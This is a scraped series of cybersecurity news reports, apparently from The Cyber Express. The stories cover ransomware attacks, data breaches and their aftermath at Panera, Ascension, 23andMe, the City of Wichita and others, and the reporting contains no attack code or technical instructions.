Despite the detailed notifications to employees, Panera has yet to publicly disclose the total number of individuals impacted by the breach. The identity of the threat actors behind the ransomware attack also remains unknown. No ransomware group has claimed responsibility, which raises speculation that the attackers might be awaiting a ransom payment or have already received it. Moreover, Panera has not responded to requests for comment from The Cyber Express regarding the outage and the ransomware attack. This lack of communication leaves several critical questions unanswered, particularly about the measures being taken to prevent future incidents and the ongoing efforts to recover from the current breach.Implications for Panera Bread Data Breach
The implications of this ransomware attack extend beyond the immediate disruption and data breach. Panera Bread's reputation is at stake, as customers and employees alike may question the company's ability to protect sensitive information. The operational disruptions also highlight vulnerabilities in the company’s IT infrastructure that need to be addressed to prevent similar incidents in the future. In response to the data breach, Panera has committed to enhancing its existing security measures. The company is likely to conduct a thorough review of its cybersecurity policies and practices to identify and address any gaps. Additionally, ongoing communication with employees and stakeholders will be crucial in rebuilding trust and ensuring that all affected parties are adequately supported. As the investigation continues, further details may emerge about the nature of the breach and the steps Panera is taking to strengthen its defenses.- Cybersecurity News and Magazine
- Truist Bank Data Allegedly Up for Sale on Dark Web: Employee Info, Transactions Exposed
Truist Bank Data Allegedly Up for Sale on Dark Web: Employee Info, Transactions Exposed
Truist Bank Data Breach Allegedly Goes on Sale on Dark Web
According to the threat actor’s post, the Truist Bank data breach is now selling for $1 million. The compromised data includes details of 65,000 employees, bank transactions containing names, account numbers, balances, and the source code for IVR funds transfers. [caption id="attachment_77051" align="alignnone" width="595"] Source: Dark Web[/caption] The post by the threat actor provides specific information about the data for sale and contact details for purchase. Additionally, the post includes various usernames, threads, reputation points, and contact information such as XMPP handles and email addresses associated with the threat actor. Meanwhile, Kulicke and Soffa Industries, a renowned semiconductor and electronics manufacturing company, disclosed a breach compromising millions of files. Initially detected on May 12, 2024, the breach exposed critical data, including source codes, engineering information, and personally identifiable information.Two Cybersecurity Incidents at Once
In response to the Kulicke and Soffa data breach, K&S swiftly initiated containment measures in collaboration with cybersecurity experts and law enforcement agencies. The company's cybersecurity team worked diligently to isolate affected servers and prevent further intrusion. Despite the breach, K&S remains committed to safeguarding its systems and data integrity. In a filing with the U.S. Securities and Exchange Commission (SEC), K&S detailed its efforts to mitigate the impact of the breach. The company assured stakeholders that, as of the filing date, the incident had not materially disrupted its operations. However, investigations are ongoing to ascertain the full extent of the breach and increase the cybersecurity measures in place. The Truist Bank data breach and the Kulicke and Soffa cyber incident highlight the persistent threat of cyberattacks faced by organizations worldwide. While both entities are actively addressing the breaches, the incidents highlight a broader case of cybersecurity measures and their impact in safeguarding sensitive information and maintaining trust in the digital age. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Life360 Targeted in Extortion Attempt, Customer Data Exposed
About Tile and Life360
Tile, much like Apple's AirTag, produces small Bluetooth-enabled devices that help users locate and track items such as keys, wallets, and bags. These devices work in conjunction with a mobile app, allowing users to find lost items using sound alerts or by viewing the last known location of the Tile tracker on a map. Tile is a subsidiary of Life360, the leading connection and safety app used by one in nine U.S. families. With over 66 million members, Life360 offers driving, location, and digital safety features that keep loved ones connected. The app's extensive user base makes the implications of any data breach potentially far-reaching.Implications of the Life360 Data Breach
While the Life360 data breach did not include highly sensitive data, the exposure of personal information such as names, addresses, and phone numbers can still have significant implications. Such data can be used for targeted phishing attacks, identity theft, and other malicious activities. The breach highlights the importance of cybersecurity measures, particularly for companies managing large databases of personal information. Life360's swift response to the incident and its cooperation with law enforcement demonstrates the company's commitment to transparency and user security.Moving Forward
In response to the breach, Life360 has reiterated its commitment to enhancing its security infrastructure and safeguarding user information. The company is taking proactive steps to prevent future cybersecurity incidents, including strengthening its cybersecurity protocols and continuing to monitor its systems for potential vulnerabilities. "We remain committed to keeping families safe online and in the real world," Hulls emphasized. The company’s prompt action and transparent communication are crucial in maintaining user trust and addressing concerns related to the breach.- Cybersecurity News and Magazine
- Single Click, Big Disruption: Employee Download Triggers Ascension Cyberattack
Single Click, Big Disruption: Employee Download Triggers Ascension Cyberattack
What Caused Ascension Cyberattack?
The cyberattack on Ascension was traced back to an innocent mistake by an employee who accidentally downloaded a malicious file, mistaking it for a legitimate one. "We have also identified how the attacker gained access to our systems. An individual working in one of our facilities accidentally downloaded a malicious file that they thought was legitimate. We have no reason to believe this was anything but an honest mistake," informed the spokesperson. This incident highlights the importance of continuous cybersecurity training and vigilance among all employees to prevent such occurrences in the future. Ascension has assured its patients and associates that there is no evidence suggesting any data was taken from the Electronic Health Records (EHR) system or other clinical systems where comprehensive patient records are securely stored. This means the most sensitive health information remains uncompromised, providing some relief amidst the ongoing investigation.Ongoing Review and Protective Measures
Ascension is currently conducting a detailed review and analysis of the potentially impacted files to determine precisely what data was affected and identify the individuals involved. This meticulous process is expected to take considerable time due to the volume and complexity of the data. In the meantime, Ascension is taking proactive steps to protect its patients and associates. The healthcare provider is offering free credit monitoring and identity theft protection services to all patients and associates, regardless of whether their data is eventually found to be compromised. This service is intended to provide immediate peace of mind and mitigate potential risks from the Ascension data breach. Individuals who wish to enroll in these protective services are encouraged to contact Ascension's dedicated call center at 1-888-498-8066.Commitment to Transparency and Legal Compliance
Ascension remains committed to transparency throughout this investigation. While specific details regarding whether an individual's data was affected cannot be provided, Ascension pledges to follow all applicable laws and regulations related to data breach notifications. "We encourage all Ascension patients and staff who are concerned to take advantage of these services. We want to be clear that this offer does not mean we have determined that any specific individual patient’s data has been compromised. Rather, it illustrates our desire to do everything possible to reassure our patients and associates, regardless of any impact to specific individuals’ data," the spokesperson explained. "Once our data analysis is complete, we are committed to following all applicable laws and regulations to notify affected individuals and the appropriate regulatory bodies. To our patients, associates, and the communities we serve, we regret any disruption or concern you may have experienced as a result of this incident," the spokesperson added.Background and Impact of Cyberattack on Ascension
On May 10, The Cyber Express reported that Ascension faced disruptions in clinical operations due to a cyberattack that prompted the organization to take some of its systems offline. Operating in 19 states and the District of Columbia, Ascension oversees 140 hospitals and 40 senior care facilities. It also boasts a significant workforce of 8,500 providers, 35,000 affiliated providers, and 134,000 associates. In 2023, Ascension’s total revenue amounted to $28.3 billion. Given its substantial revenue and widespread operations, the impact of this cyberattack was significant. The organization detected unusual activity on select technology network systems, prompting an immediate response, investigation initiation, and activation of remediation efforts. Due to the cyberattack, Ascension advised its business partners to temporarily sever connections to its systems as a precautionary measure and stated it would notify partners when it is safe to reconnect. The cyberattack on Ascension disrupted clinical operations, prompting an investigation into the extent and duration of the disruption.- Cybersecurity News and Magazine
- City of Moreton Bay Investigates Data Breach After Resident Discovered Leak of Private Information
City of Moreton Bay Investigates Data Breach After Resident Discovered Leak of Private Information
Data Breach Discovered By Local Resident
City of Moreton Bay resident Piper Lalonde, who works as a data analyst, had discovered the breach along with her husband. They were shocked to learn that their personal information was freely available on the council's customer request online portal. The couple had discovered that the information included their phone numbers, complaints, and requests that they had made for new bins, along with the GPS coordinates of where the requests had been filed. A further investigation into the breach had revealed that the personal information of some of their friends and neighbors who were fellow ratepayers were also available in the records after they conducted a search. Piper reported this information to the council, with the website being taken down the next day. However, she was still unsatisfied with the lack of notification about the incident to impacted residents. Piper stated, "I would expect they'd have to send out some formal communication letting people know their information was publicly accessible, but there was no indication they were going to do that." She expressed concern about the possibility of people stumbling upon complaints made about them by other residents. She added, "If this gets in the wrong hands — it just takes one person to see a complaint about them, and who knows what they'll do."City of Moreton Bay Responses to Data Breach
After Piper's report, the website was said to be taken down. The site appears to be functional as of now, with some functions still limited. The website includes an official notice in response to the incident. [caption id="attachment_76878" align="alignnone" width="2204"] Source: moretonbay.qld.gov.au[/caption]We are experiencing system difficulties with our customer request portal. Our third-party provider is investigating a possible information breach. The cause is yet to be determined but there is no indication this is a cyber attack. We will never contact you via unsolicited calls to request sensitive information. No action is required from you at this stage. We will continue to keep you informed.The notice appears to indicate that the breach stemmed from a third-party provider. The Cyber Express team has reached out to the Moreton Bay Council's Privacy Officer for further information on the breach, however no response has been received as of publication time. The potential scale of the data breach, as well as its impact on residents, is currently unknown. It is also unclear on how many individuals may have accessed the available data before the website had been temporarily taken down and subsequently limited. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
- Cybersecurity News and Magazine
- Medusa Ransomware Group Claims Cyberattack on Organizations in USA, Canada
Medusa Ransomware Group Claims Cyberattack on Organizations in USA, Canada
MEDUSA Ransomware Attack: The Latest Victims
GEMCO Constructors is headquartered in Indianapolis, Indiana, USA. The ransomware actors have claimed to have access to 1.0 TB of the organization's data and has threatened to publish it within 6-7 days. The second company that the group has claimed to have targeted is Dynamo, which is based in Saskatchewan, Canada. Data of the company, which specializes in electrical and electronic manufacturing, has allegedly been compromised. MEDUSA has claimed to have exfiltrated 149.6 GB of the organization's data and plans to publish it within 6-7 days. Farnell Packaging, a Canadian company in the packaging and container industry, has also allegedly been attacked. The attackers claimed to have accessed 193.9 GB of the organization's data and warned the data would be published within 8–9 days. Despite the gigantic claims made by the ransomware group, the official websites of the targeted companies seem to be fully operational, with no signs of foul play. The organizations, however, have not yet responded to the alleged cyberattack, leaving the claims made by the ransomware group unverified. The article would be updated once the respective organizations respond to the claims. The absence of confirmation raises the question of the authenticity of the ransomware claim. It remains to be seen whether it is a tactic employed by MEDUSA to garner attention or if there are ulterior motives attached to their actions. Only an official statement by the affected companies can shed light on the true nature of the situation. However, if the claims made by the MEDUSA ransomware group do turn out to be true, then the consequences could be far-reaching. The potential leak of sensitive data could pose a significant threat to the affected organizations and their employees.Background of MEDUSA Ransomware Group
MEDUSA first burst onto the scene in June 2021 and has since targeted organizations in various countries across multiple industries, including healthcare, education, manufacturing, and retail. Most of the companies, though, have been established in the United States of America. MEDUSA functions as a Ransomware-as-a-Service (RaaS) platform. It provides would-be attackers with malicious software and infrastructure required to carry out disruptive ransomware attacks. The ransomware group also has a public Telegram channel that threat actors use to post data that might be stolen, which could be an attempt to extort organizations and demand payment.Previous Ransomware Attacks
Less than three weeks ago, MEDUSA ransomware group claimed a cyberattack on Comwave, a Canadian communications giant renowned for providing internet, network security solutions, and customer support services. In January 2024, a prominent non-profit organization, Water For People, was targeted by the group. The organization faced the pressure of a deadline to comply with the demands of the ransomware group. MEDUSA also targeted four organizations across different countries, including France, Italy, and Spain. The group’s modus operandi remains uniform, with announcements being made on their dark web forum accompanied by deadlines and ransom demands. As organizations deal with the fallout of cyberattacks by groups like MEDUSA, it becomes crucial to remain vigilant and implement stringent security measures. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.UK and Canada Privacy Watchdogs Probe 23andMe Data Breach
Focus of 23andMe Data Breach Investigation
The joint investigation will examine three key aspects:- Scope of Information Exposed: The breadth of data affected by the breach and the potential harm to individuals arising from it.
- Security Measures: Evaluate whether 23andMe had adequate safeguards to protect the sensitive information under its control.
- Breach Notification: Review whether the company provided timely and adequate notification to the regulators and affected individuals, as mandated by Canadian (PIPEDA) and UK (GDPR) data protection laws.
“People need to trust that any organization handling their most sensitive personal information has the appropriate security and safeguards in place. This data breach had an international impact, and we look forward to collaborating with our Canadian counterparts to ensure the personal information of people in the UK is protected.”Dufresne on the other hand stated the risks associated with genetic information in the wrong hands. He said:
“In the wrong hands, an individual’s genetic information could be misused for surveillance or discrimination. Ensuring that personal information is adequately protected against attacks by malicious actors is an important focus for privacy authorities in Canada and around the world.”The data protection and privacy laws in the UK and Canada allow such joint investigations on matters that impact both jurisdictions. Each regulator will assess compliance with the relevant laws they oversee. Neither of the privacy commissioner offices however provided further details on how they would charge or penalize 23andMe, if found in violation of GDPR or PIPEDA. “No further comment will be made while the investigation is ongoing,” the UK ICO said. 23andMe acknowledges the joint investigation announced by the Privacy Commissioner of Canada and the UK Information Commissioner today.
“We intend to cooperate with these regulators’ reasonable requests relating to the credential stuffing attack discovered in October 2023,” a 23andMe spokesperson told The Cyber Express.
Genetic Testing Company 23andMe Data Breach Timeline
23andMe first disclosed details of the October data breach in an 8-K filing with the U.S. Securities and Exchange Commission. The genetic testing company said attackers scraped profiles of 23andMe users who opted in to using the company’s DNA Relatives feature. This profiling feature connects users with genetic distant relatives - or other 23andMe users who share their bits of DNA. The attackers used credential stuffing attacks that affected 0.1% of user accounts, the company told SEC. Using these accounts as a launchpad, hackers were able to access “a significant number of files containing profile information about other users' ancestry.” Threat actors claimed on underground forums that they were able to siphon “20 million pieces of code” from 23andMe. The claimed data set included information DNA ancestry backgrounds belonging to more than 1.3 million Ashkenazi Jewish and Chinese users. By the end of October, another threat actor claimed compromise of 4 million genetic profiles, which the company also investigated. The genetic testing company 23andMe said it notified the affected 6.9 million users - 5.5 million DNA Relatives profiles and 1.4 million Family Tree profile – in December. The company told federal regulators that the data breach incident was set to incur between $1 million and $2 million in one-time expenses. The company faces at least 30 class action lawsuits in U.S.state and federal jurisdictions as well as in Canada. 23andMe blamed the customers’ poor security hygiene for the breach and has since made two-step verification a prerequisite for account logon. It also mandated customers to reset their passwords. *Update 1 (June 12 – 12:00 AM EST): Added response from the 23andMe spokesperson.- Cybersecurity News and Magazine
- City of Wichita Recovers from Cyberattack: Water Services Back Online, More Progress Expected
City of Wichita Recovers from Cyberattack: Water Services Back Online, More Progress Expected
City of Wichita Cyberattack Update
Water Services Restored Customers can expect to receive updated statements this week. Auto-payments have resumed normal operations, and customers now have full access to their utility accounts online. Bills can be paid by credit card, cash, check, and money order at City Hall, online at City's payment portal, by calling (316) 265-1300, or through the mail. Due to the cyberattack on City of Wichita, some June bills may cover more than 60 days of service. Customers needing help with these bills are encouraged to contact a representative at (316) 265-1300 to arrange a payment plan. Library Services Update The Wichita Public Library has also seen progress, though some services remain affected. Public Wi-Fi is available at all locations, and patrons can access Libby for eBooks, audiobooks, and digital magazines. Additionally, materials can be checked in and out manually. However, hold requests and renewals, customer account information, the online catalog, the automated materials handler at the Advanced Learning Library, and online databases like Kanopy and LinkedIn Learning are still unavailable. Airport and Court Systems At the Wichita Dwight D. Eisenhower National Airport, public flight and gate display information is not yet available online but is expected to be restored soon. The Municipal Court has made strides in recovery, with most systems operational. The public search of warrants is anticipated to be online by Monday, June 10. The City’s Information Technology team is working to fix the remaining system outages. The city appreciates residents' patience as there may be occasional service interruptions during ongoing recovery efforts.What Happened During the City of Wichita Cyberattack
The Cyber Express reported that the cyberattack occurred on May 5, leading to the shutdown of several online city services, including water bill payments, some city-building Wi-Fi, and electronic payments. LockBit, a known ransomware group, claimed responsibility for the cyberattack. This followed an earlier notification from the City of Wichita regarding a ransomware incident, although the responsible group was not initially disclosed. The ransomware attack has shown the vulnerabilities in the city's IT systems and the importance of strong cybersecurity measures. Despite the challenges, the city has worked hard to restore essential services to its residents. The City of Wichita urges residents to stay informed through official updates and to reach out to the provided contact points for help. The city remains committed to being transparent and providing the necessary support to its residents during this recovery period.- Cybersecurity News and Magazine
- Findlay Automotive Hit by Cybersecurity Attack, Investigation Ongoing
Findlay Automotive Hit by Cybersecurity Attack, Investigation Ongoing
Operational Impact of Findlay Automotive Cybersecurity Issue
Despite the restrictions imposed by the Findlay Automotive cybersecurity issue, all dealership locations remain open. Customers with vehicles currently in service are encouraged to visit or contact their respective service departments directly for assistance from Findlay’s dedicated staff. "At Findlay Automotive, we have been serving our communities with pride and integrity since 1961," reads the company’s Facebook Post. "We take our responsibility to our customers and the community very seriously. We will continue to provide updates as the investigation continues and more information becomes available.” The urgency and gravity of the situation are highlighted by recent trends in cybersecurity, particularly the rising threat of ransomware attacks in the industrial sector.Rising Cyber Threats in the Industrial Sector
In 2019, industrial companies faced significant financial burdens due to ransomware, collectively paying out $6.9 million, which accounted for 62% of the total $11 million spent on ransomware that year. Despite representing only 18% of ransomware cases, the manufacturing sector bore the brunt of the financial impact. By 2020, the cross-industry cost of ransomware had escalated to a staggering $20 billion. Gartner, a research firm, has projected that by 2023, the financial repercussions of cyberattacks on industrial systems, including potential fatal casualties, could exceed $50 billion. The automotive sector, in particular, has become a prime target for cybercriminals. As these threats intensify, paying ransoms become increasingly weak, emphasizing the necessity of enhanced cybersecurity measures to protect assets. The recent Volkswagen incident exemplifies the magnitude of these threats. In April 2024, Volkswagen faced a cyberattack, suspected to originate from Chinese hackers. The breach exposed sensitive data, including development plans for gasoline engines and critical information on e-mobility initiatives. Investigations by ZDF Frontal and “Der Spiegel” revealed more than 40 internal documents, highlighting the severity of the cyberattack. Similarly, in February 2024, Thyssenkrupp's automotive unit in Duisburg, Germany, experienced a cyberattack that disrupted production in its car parts division. Although no data theft or manipulation was detected, the company had to take several systems offline to prevent further unauthorized access, underlining the operational risks posed by such cyber incidents. Closer to home, Eagers Automotive Limited faced a cyber incident on December 27, 2023, leading to a temporary trading halt to address its continuous disclosure obligations. The company issued an apology to its customers for the inconvenience caused by the disruption, reflecting the broad and often immediate impact of cyberattacks on automotive businesses. Findlay Automotive’s proactive response to the current cybersecurity issue demonstrates its commitment to safeguarding its operations and customer trust. The company is maintaining open lines of communication with customers, providing regular updates as the investigation progresses and more information becomes available.- Cybersecurity News and Magazine
- NoName Ransomware Claims Yet Another Attack on Germany after Ukraine President’s Visit
NoName Ransomware Claims Yet Another Attack on Germany after Ukraine President’s Visit
Previous Instances of NoName Ransomware Attacks
Since first emerging on dark web in March 2022, the pro-Russian hacker group NoName has been increasingly active, shortly after Russia’s invasion of Ukraine. The group has taken responsibility for a series of cyberattacks targeting government agencies, media outlets, and private companies across Ukraine, the United States, and Europe. Before making the claim of targeting German websites, NoName had a history of targeting prominent organizations in other countries. In April 2024, the group allegedly launched a cyberattack on Moldova, affecting key government websites such as the Presidency, Ministry of Foreign Affairs, Ministry of Internal Affairs, and the State Registry. These websites were rendered inaccessible, displaying the message, “This Site Can’t be Reached.” The attack hinted at a politically motivated agenda, though NoName did not explicitly disclose their motives. In March 2024, NoName targeted multiple websites in Denmark, including significant entities like Movia, Din Offentlige Transport, the Ministry of Transport, Copenhagen Airports, and Danish Shipping. Similarly, in January 2024, the group attacked high-profile websites in the Netherlands, including OV-chipkaart, the Municipality of Vlaardingen, the Dutch Tax Office (Belastingdienst), and GVB. More recently, NoName’s cyber onslaught on Finland raised further alarms. Finnish government organizations, including Traficom, the National Cyber Security Centre Finland (NCSC-FI), The Railways, and the Agency for Regulation and Development of Transport and Communications Infrastructure, faced temporary inaccessibility due to DDoS attacks. The ongoing cyberattacks by NoName across several countries serve as a reminder of the perils of the digital landscape. The operations of NoName ransomware, combined with their alleged political motives, highlight the urgent need for enhanced cybersecurity measures and international cooperation. The cybersecurity community must remain vigilant and proactive in protecting digital infrastructure from such malicious actors. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- Ascension Makes Progress in Restoring Systems After Cyberattack, Patients to See Improved Wait Times
Ascension Makes Progress in Restoring Systems After Cyberattack, Patients to See Improved Wait Times
Ascension cyberattack: What All Have Restored?
According to the latest update on the Ascension cyberattack, officials have successfully restored EHR access in Florida, Alabama, Tennessee, Maryland, Central Texas (Ascension Seton and Dell Children's hospitals), and Oklahoma markets. Ascension Via Christi further informed that its hospitals, including St. Francis and St. Joseph hospitals, and Ascension Medical Group clinics in Wichita, have restored the primary technology used for electronic patient documentation in care settings. "This will allow most hospital departments, physician offices, and clinics to use electronic documentation and charting. Patients should see improved efficiencies and shorter wait times. Our team continues to work tirelessly to restore other ancillary technology systems," Ascension Via Christi explained on its website, providing cybersecurity updates for its Kansas facilities. [caption id="attachment_76455" align="aligncenter" width="1024"] Source: Ascension Via Christi Website[/caption] The update for Ascension Via Christi St. Francis followed a national update from Ascension, which reported continued progress in restoring systems across its network. The company aims to have systems fully restored across its ministry by Friday, June 14.Ascension cyberattack: What Happened?
On May 10, The Cyber Express reported that Ascension faced disruptions in clinical operations due to a cyberattack that prompted the organization to take some of its systems offline. Operating in 19 states and the District of Columbia, Ascension oversees 140 hospitals and 40 senior care facilities. It also boasts a significant workforce of 8,500 providers, 35,000 affiliated providers, and 134,000 associates. In 2023, Ascension’s total revenue amounted to $28.3 billion. Given its substantial revenue and widespread operations, the impact of this cyberattack was significant. The organization detected unusual activity on select technology network systems, prompting an immediate response, investigation initiation, and activation of remediation efforts. Consequently, access to certain systems has been interrupted during the ongoing investigation process. Due to the massive cyberattack, Ascension advised its business partners to temporarily sever connections to its systems as a precautionary measure and stated it would notify partners when it is safe to reconnect. The cyberattack on Ascension disrupted clinical operations, prompting an investigation into the extent and duration of the disruption.- Cybersecurity News and Magazine
- Hawk Eye App Data Breach in India: Police Credit The Cyber Express for Exclusive Leads to Arrest Hacker
Hawk Eye App Data Breach in India: Police Credit The Cyber Express for Exclusive Leads to Arrest Hacker
Background of Hawk Eye App Data Breach
The Hawk Eye App was launched by the Telangana Police in December 2014 for both Android and iPhone users as part of its initiative to become a citizen-friendly and responsive police force. Denizens were encouraged to use the app to report on a wide range of activities, including traffic violations, passing on information about criminals, violations by police, and crime against women, and also to pass on suggestions to the lawmen for improved policing and to credit the good work done by them. A key feature of the app is the SOS button for accessing help in case of emergencies. On May 29, 2024, a threat actor, who goes by the name “Adm1nFr1end”, revealed that he had breached the Hawk Eye app. He shared that the stolen database had sensitive data of over 200,000 citizens, including their Personally Identifiable Information (PII), names, email addresses, phone numbers, physical addresses, IMEI numbers, and location coordinates. The threat actor had posted samples of the data breach on hacking website BreachForums and was selling this compromised data for USD $150. [caption id="attachment_73714" align="alignnone" width="1123"] Source: X[/caption]Arrest of Hawk Eye App Data Breach Hacker
In the aftermath of the news report published on this website, the Telangana Police registered a suo moto case on June 4. “We have registered a case and are investigating the hacking allegations and suspected data breach,” said Telangana Cyber Security Bureau (TGCSB) Director Shikha Goel. On June 9, the Telangana Police reported that its Cyber Security Bureau has apprehended a hacker involved in the Hawk Eye app data breach. “Acting swiftly, the TGCSB investigators travelled to Delhi, where they identified and arrested the hacker, who had claimed to have posted the compromised data on a public platform for a price,” the police said in a statement. Sharing details of the arrest, Director General of Police of Telangana Police, Ravi Gupta, who is the top cop of the state, said that the police had used advanced tools to successfully unveil the hacker's identity. He, however, refrained from elaborating on the techniques used to arrest the hacker to ensure secrecy. “The hacker had posted details of the breach on databreachforum.st, offering the compromised data for sale at $150 USD. He provided the Telegram IDs “Adm1nfr1end” and “Adm1nfr1ends” for interested buyers to contact him regarding the Hawk Eye data,” Ravi said. The alleged hacker was identified as Jatin Kumar, a 20-year-old student and a resident of Greater Noida, a prominent suburb in Delhi's National Capital Region. The police also shared that he was arrested earlier in a case for cybersecurity fraud. (This is Part 1 of the article. Click here to learn more about the hacker, why he was selling the data and how the police tracked him down)- Cybersecurity News and Magazine
- Hacker Claims Cyberattack on China’s Massive Power Grid SGCC, Selling Stolen Data
Hacker Claims Cyberattack on China’s Massive Power Grid SGCC, Selling Stolen Data
Potential Implications of Cyberattack on SGCC
Established on December 29, 2002, SGCC is the largest utility company in the world and consistently ranks second on the Fortune Global 500 list. SGCC operates as a group with RMB 536.3 billion in registered capital and employs 1.72 million people. It provides power to over 1.1 billion people across 26 provinces, autonomous regions, and municipalities, covering 88% of China's national territory. Additionally, SGCC owns and operates overseas assets in countries such as the Philippines, Brazil, Portugal, Australia, and Italy. If the claims of the cyberattack on SGCC made by Desec0x are proven to be true, the implications could be far-reaching. The sensitive nature of the data allegedly stolen, including personal and departmental information of SGCC employees, could have serious consequences for the company and its stakeholders. However, upon accessing the official SGCC website, no signs of foul play were detected, and the website appeared to be functioning normally.Global Context of Cyberattacks in the Energy Sector
The energy sector has been increasingly targeted by cyberattacks, often involving third-party data breaches. According to Security Intelligence, 90% of the world’s top energy companies suffered from third-party data breaches in 2023. Additionally, nearly 60% of cyberattacks in the energy sector are attributed to state-affiliated actors. In late 2023, 22 energy firms were targeted in a large-scale coordinated attack on Danish infrastructure. In April 2024, a group called Cyber Army Russia claimed responsibility for a cyberattack on Consol Energy, a prominent American energy company headquartered in Cecil Township, Pennsylvania. This cyberattack reportedly disrupted the company's website accessibility, causing issues for users outside the United States. In March 2024, a dark web actor was reportedly selling access to an Indonesian energy company, believed to be the same threat actor who targeted an American manufacturer. In 2023, a suspected cyberattack on Petro-Canada was officially confirmed. Suncor Energy, the holding company of Petro-Canada, acknowledged that an IT outage over the weekend was indeed a cyberattack. The company stated that it took immediate action upon discovering the attack, collaborating with third-party experts to investigate and address the situation. This incident caused significant disruptions to Petro-Canada's operations, affecting gas stations and preventing customers from accessing the Petro-Canada app and website. In the case of the State Grid Corporation of China, the claims made by Desec0x remain unverified until an official statement is released by SGCC. Without confirmation from the company, the alleged cyberattack on SGCC and data breach cannot be substantiated. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- Cyberattack Disrupts Services on Popular Japanese Video-Sharing Site Niconico
Cyberattack Disrupts Services on Popular Japanese Video-Sharing Site Niconico
How Cyberattack on Niconico Happened
Beginning in the early hours of Saturday, June 8th, an issue arose that prevented access to multiple servers within the group. In response, Kadokawa immediately shut down the relevant servers to protect data. Based on the internal analysis and investigation conducted that same day, it was determined that there was a high possibility of a cyberattack. Kadokawa is investigating the impact of the attack, including "whether there have been leaks of information," and is cooperating with external experts and the police. Niconico, known for its diverse content and live-streaming capabilities, plays a crucial role in the digital landscape of Japan. The suspension of its services has undoubtedly caused widespread concern among its user base, which spans millions of people who rely on the platform for entertainment, information, and community engagement.Concern Over Niconico Cyberattack
Users have taken to social media to express their support and concern. One user tweeted, “I’ll wait until it’s back. I can’t be of much help, but I’m rooting for you. Niconico saved my life. I can’t imagine life without it.” Another user wrote, “Thank you for your hard work. We will wait patiently, so please don’t push yourself too hard and be patient.” [caption id="attachment_76115" align="aligncenter" width="622"] Source: X[/caption] Some users speculated about the cyberattack on Niconico origins and motives, with one asking, “Do you know who carried out the cyber attack?😓” and another suggesting, “If the attacks are this relentless, it’s almost like they’re testing something...?” [caption id="attachment_76116" align="aligncenter" width="621"] Source: X[/caption] As the investigation of the Niconico cyberattack continues, users and stakeholders await further updates on the situation. The company’s priority remains ensuring the complete elimination of the threat and safeguarding the integrity of its data and services.- Cybersecurity News and Magazine
- TCE Cyberwatch: Ticketmaster Hacked, Deepfakes Target Businesses, and More